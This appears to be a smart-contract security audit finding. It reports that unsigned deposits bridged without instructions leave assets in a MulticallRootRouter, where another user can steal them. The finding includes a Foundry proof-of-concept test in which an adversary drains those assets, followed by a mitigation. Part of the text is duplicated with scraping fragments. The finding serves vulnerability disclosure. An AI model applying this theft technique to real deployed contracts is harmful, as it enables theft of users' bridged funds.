If an unsigned deposit is bridged without instruction params the assets are bridged to the MulticallRouter and can be stolen by another user.
Proof Of Concept
For the Deposit flags 0x02 & 0x03 corresponding to bridging out assets without a Virtual Account as a receiver, the receiver is the MulticallRouter. The problem is that if a user hasn't specified params for further execution executeWithDeposit doesn't revert which means the bridged assets remain in the MulticallRootRouter. At that point an adversary can send a message from a Branch Chain (0x01 flag) & Output params that correspond the to the left assets and steal them.
function executeWithDeposit(address _router, bytes calldata _payload, uint16 _srcChainId)
// Read Deposit Params
DepositParams memory dParams = DepositParams({
depositNonce: uint32(bytes4(_payload[PARAMS_START:PARAMS_TKN_START])),
hToken: address(uint160(bytes20(_payload[PARAMS_TKN_START:PARAMS_TKN_START_SIGNED]))),
token: address(uint160(bytes20(_payload[PARAMS_TKN_START_SIGNED:45]))),
amount: uint256(bytes32(_payload[45:77])),
deposit: uint256(bytes32(_payload[77:PARAMS_TKN_SET_SIZE]))
// Bridge In Assets
_bridgeIn(_router, dParams, _srcChainId);
// Check if there is additional calldata in the payload
if (_payload.length > PARAMS_TKN_SET_SIZE) {
//Execute remote request
IRouter(_router).executeDepositSingle{value: msg.value}(
_payload[PARAMS_TKN_SET_SIZE:], dParams, _srcChainId
Coded POC
Place the following test in RootTest contract inside RooTest.t.sol
Run the test with forge test --match-test testEmptyInstructionsGrief -vv
Output - logs that an adversary user stole assets from the MulticallRouter that were there because of missing instructions from an innocent user's Bridge Out.
function testEmptyInstructionsGrief() public {
// Innocent user
address user = address(0x7777);
// Get some avax underlying assets
avaxMockAssetToken.mint(user, 100 ether);
hevm.deal(user, 1 ether);
DepositInput memory depositInput = DepositInput({
hToken: avaxMockAssethToken,
token: address(avaxMockAssetToken),
amount: 100 ether,
deposit: 100 ether
GasParams memory gasParams = GasParams({
gasLimit: 0.5 ether,
remoteBranchExecutionGas: 0.5 ether
// empty instructions for the router
bytes memory packedData = abi.encodePacked("");
// start prank from innocent user
// bridge out assets
avaxMockAssetToken.approve(address(avaxPort), 100 ether);
avaxMulticallBridgeAgent.callOutAndBridge{value: 1 ether}(
payable(user), packedData, depositInput, gasParams
// Inspect the Root router balance
console2.log("Root router balance before", ERC20hTokenRoot(newAvaxAssetGlobalAddress).balanceOf(address(rootMulticallRouter)));
// Adversary user
address adversary = address(0x1111);
hevm.deal(adversary, 1 ether);
Multicall2.Call[] memory calls = new Multicall2.Call[](1);
// Mock Omnichain dApp call
calls[0] = Multicall2.Call({
target: newArbitrumAssetGlobalAddress,
callData: abi.encodeWithSelector(bytes4(0xa9059cbb), mockApp, 0 ether)
// Specifies output params that correspond to the left assets in the Root Router
OutputParams memory outputParams = OutputParams(adversary, newAvaxAssetGlobalAddress, 100 ether, 100 ether);
bytes memory stealData = abi.encode(calls, outputParams, avaxChainId);
bytes memory finalizedData = abi.encodePacked(bytes1(0x02), stealData);
// Send malicious message
avaxMulticallBridgeAgent.callOut{value: 1 ether}(
payable(adversary), finalizedData, gasParams
// Inspect router & adversary avax balance
console2.log("Root router balance after", ERC20hTokenRoot(newAvaxAssetGlobalAddress).balanceOf(address(rootMulticallRouter)));
console2.log("Adversary mock avax token balance after", avaxMockAssetToken.balanceOf(adversary));
Tools Used
Manual Inspection
Recommended Mitigation Steps
If an unsigned bridge is performed (0x02, 0x03 flags) revert the execution on the RootBridgeAgent if there are no params instructions for the MulticallRootRouter
Lines of code
Vulnerability details
If an unsigned deposit is bridged without instruction params the assets are bridged to the MulticallRouter and can be stolen by another user.
Proof Of Concept
For the Deposit flags 0x02 & 0x03 corresponding to bridging out assets without a Virtual Account as a receiver, the receiver is the MulticallRouter. The problem is that if a user hasn't specified params for further execution
doesn't revert which means the bridged assets remain in theMulticallRootRouter
. At that point an adversary can send a message from a Branch Chain (0x01 flag) & Output params that correspond the to the left assets and steal them.Coded POC
contract insideRooTest.t.sol
forge test --match-test testEmptyInstructionsGrief -vv
Output - logs that an adversary user stole assets from the MulticallRouter that were there because of missing instructions from an innocent user's Bridge Out.
Tools Used
Manual Inspection Foundry
Recommended Mitigation Steps
If an unsigned bridge is performed (0x02, 0x03 flags) revert the execution on the
if there are no params instructions for theMulticallRootRouter
Assessed type